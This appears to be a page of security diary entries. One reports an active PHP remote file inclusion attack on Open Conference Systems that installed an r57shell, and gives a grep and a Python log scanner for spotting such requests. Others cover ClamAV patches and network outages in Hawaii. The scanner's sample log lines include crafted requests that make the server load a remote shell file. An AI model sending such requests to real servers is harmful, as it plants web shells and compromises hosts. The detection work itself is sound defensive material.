Active exploit of Open Conference Systems web application
We're looking into a host compromise reported by Mike, a diary reader. Mike reported a PHP remote file inclusion attack against an Open Conference Systems web application used in his organization. A modified r57shell php script was used to compromise the system.
A vulnerability disclosure for the Open Conference System was posted to BugTraq on Friday October 13th which states that versions <= 1.1.3 are vulnerable. Interestingly enough, the official software distribution site at http://pkp.sfu.ca/ocs_download/ states that all versions prior to version 1.1.6 are vulnerable. Take a look at your respective environments to determine if you are running OCS software, and if you find it... Do I have to say it? Patch.
The time between vulnerability disclosure and determined time of host compromise in this case was approximately 1.5 hours. I can only speculate as to how many hosts have already or are yet to become phishing sites, spammer nodes, iframe exploit hosts or fall prey to any other manner of abuse due to this vulnerability.
If you do have OCS installed, a quick check for abuse is to run the following command against your web server logs:
grep "fullpath=http:" YourWebServerLogLocation.log
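The grep above only matches the literal string "fullpath=http:", so a request with the URL percent-encoded (fullpath=http%3A%2F%2F...) slips past it. The following script is an added example, not part of the diary: it parses combined-format access log lines, URL-decodes every query parameter and reports any parameter whose value is a remote URL. The log lines, client addresses, script path and file name in it are constructed for illustration.

```python
"""Flag PHP remote-file-inclusion attempts (e.g. the OCS fullpath=http://... case)
in Apache/nginx combined-format access logs. Added example, not the diary's code."""
import re
from urllib.parse import urlsplit, parse_qsl

# Any parameter value that starts with a remote scheme is reported, not just
# "fullpath": this generalises the diary's grep to other parameter names and
# to https/ftp, and decoding catches percent-encoded variants as well.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)

# Combined log format: client ident user [time] "METHOD target HTTP/x" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (addresses from documentation ranges, path and file
# name are placeholders, not the real OCS script).
SAMPLE_LOG = """\
203.0.113.9 - - [13/Oct/2006:19:02:11 -0400] "GET /ocs/some_script.php?fullpath=http://198.51.100.7/shell.txt HTTP/1.1" 200 512
203.0.113.9 - - [13/Oct/2006:19:02:40 -0400] "GET /ocs/some_script.php?fullpath=http%3A%2F%2F198.51.100.7%2Fshell.txt HTTP/1.1" 200 512
192.0.2.44 - - [13/Oct/2006:19:05:01 -0400] "GET /ocs/index.php?conf=2006 HTTP/1.1" 200 4096
"""


def rfi_hits(line):
    """Return (client, path, param, decoded_value) for each query parameter in
    the request whose decoded value is a remote URL; [] if none or unparseable."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    client, _ts, _method, target, _status = m.groups()
    parts = urlsplit(target)
    hits = []
    # parse_qsl percent-decodes names and values, so %3A%2F%2F becomes ://
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            hits.append((client, parts.path, name, value))
    return hits


def scan(lines):
    """Scan an iterable of log lines and collect every RFI hit found."""
    hits = []
    for line in lines:
        hits.extend(rfi_hits(line))
    return hits


if __name__ == "__main__":
    for client, path, name, value in scan(SAMPLE_LOG.splitlines()):
        print(f"{client} {path} {name}={value}")
```

Run it against a real log with `scan(open("access.log"))`; each hit identifies the client, the script requested and the parameter carrying the remote URL.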
Handler on Duty
William Salusky
ClamAV fixes multiple vulnerabilities
Multiple vulnerabilities have been fixed with the release of version 0.88.5 of the free and open-source ClamAV AntiVirus product related to the handling of PE files and the unpacking of CHM help files. The PE handling issue poses a significant risk and users of versions prior to ClamAV 0.88.5 are urged to upgrade ASAP.
Also noteworthy on the ClamAV site is the availability of release candidate v0.90RC1. You may want to consider testing this new release of ClamAV in addition to performing the security upgrade above.
Handler on Duty
William Salusky
Hawaii connectivity
After this morning's earthquake, we have reports of networks to or in Hawaii that are down, including www.hawaii.gov. News about the incident can be found at:
http://www.thehawaiichannel.com/video/4324656/index.html ,
http://www.thehawaiichannel.com/news/index.html ,
http://www.cnn.com , and
http://the.honoluluadvertiser.com/article/2006/Oct/15/br/br9634517802.html . We send our best wishes to the residents of Hawaii. (Thanks to two readers for their help.)